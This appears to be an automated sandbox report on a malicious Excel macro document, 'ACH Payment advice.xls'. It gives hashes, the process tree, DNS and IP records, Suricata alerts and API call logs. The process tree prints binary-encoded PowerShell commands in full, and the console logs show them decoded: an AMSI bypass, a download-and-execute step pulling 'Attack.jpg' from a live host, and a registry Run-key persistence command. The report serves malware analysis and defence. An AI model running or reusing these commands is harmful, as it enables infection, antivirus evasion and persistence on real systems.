Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 10, 2021, 8:58 a.m.	Sept. 10, 2021, 9 a.m.

Size	43.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Mon Aug 30 22:38:19 2021, Security: 0
MD5	`32c5a46b56efa1bf2f1725e010a2fc60`
SHA256	`fa4ac33a35542f887f49fc7649cc7bf200215682add4184c352a60537ea44bb8`
CRC32	`B65AE217`
ssdeep	`768:P0mk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJIFLQNs+1odxjx5G6toKnpmcC:xk3hOdsylKlgxopeiBNhZFGzE+cL2kdc`
Yara	Generic_Malware_Zero - Generic Malware Microsoft_Office_File_Zero - Microsoft Office File Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" "C:\Users\test22\AppData\Local\Temp\ACH Payment advice.xls"
2488
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)|IEX
  2736
  - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\notepad.js"
    2960
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
      2180
      - notepad.exe "C:\WINDOWS\syswow64\notepad.exe"
        212
    - cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
      2512
      - reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
        2220
    - cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y
      644

Name	Response	Post-Analysis Lookup
google.com	A 142.250.207.78	172.217.175.238
freightmgmt.duckdns.org	A 194.5.98.207	194.5.98.207
dreamwatchevent.com	A 144.208.125.220	144.208.125.220

IP Address	Status	Action
142.250.207.78	Active	Moloch
144.208.125.220	Active	Moloch
164.124.101.2	Active	Moloch
194.5.98.207	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
UDP 192.168.56.103:53498 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.103:49182	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.103:49186 194.5.98.207:691	None	None	None

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 10, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 10, 2021, 8:58 a.m.			0	0
IsDebuggerPresent Sept. 10, 2021, 8:58 a.m.			0	0

Command line console output was observed (50 out of 53 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s console_handle: 0x00000023	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: upported." console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: At line:1 char:217 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x00000047	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000053	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]:: <<<< SecurityProto console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: col = $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Aut console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: om'+'atio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non%^ console_handle: 0x00000077	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: '.replace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);do {$ping = console_handle: 0x00000083	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: sd -join '') console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000103	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: At line:1 char:352 console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000127	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = console_handle: 0x00000133	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'a console_handle: 0x0000013f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: tio'+'n.A'+'m'+'si'+'Utils').GetField <<<< ('a'+'ms'+'iI'+'nitFa'+'iled','Non%^ console_handle: 0x0000014b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: '.replace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);do {$ping = console_handle: 0x00000157	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x00000163	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000016f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x0000017b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x00000187	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x00000193	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: sd -join '') console_handle: 0x0000019f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + CategoryInfo : InvalidOperation: (GetField:String) [], RuntimeE console_handle: 0x000001ab	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: xception console_handle: 0x000001b7	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000001c3	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000001e3	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: At line:1 char:441 console_handle: 0x000001ef	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x000001fb	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000207	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = console_handle: 0x00000213	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'a console_handle: 0x0000021f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: tio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non%^'.repl console_handle: 0x0000022b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue <<<< ($null,$true);do {$ping = console_handle: 0x00000237	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x00000243	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000024f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x0000025b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x00000267	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x00000273	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: sd -join '') console_handle: 0x0000027f	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: + CategoryInfo : InvalidOperation: (SetValue:String) [], RuntimeE console_handle: 0x0000028b	1	1
WriteConsoleW Sept. 10, 2021, 8:58 a.m.	buffer: xception console_handle: 0x00000297	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 91 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007139d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007138d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
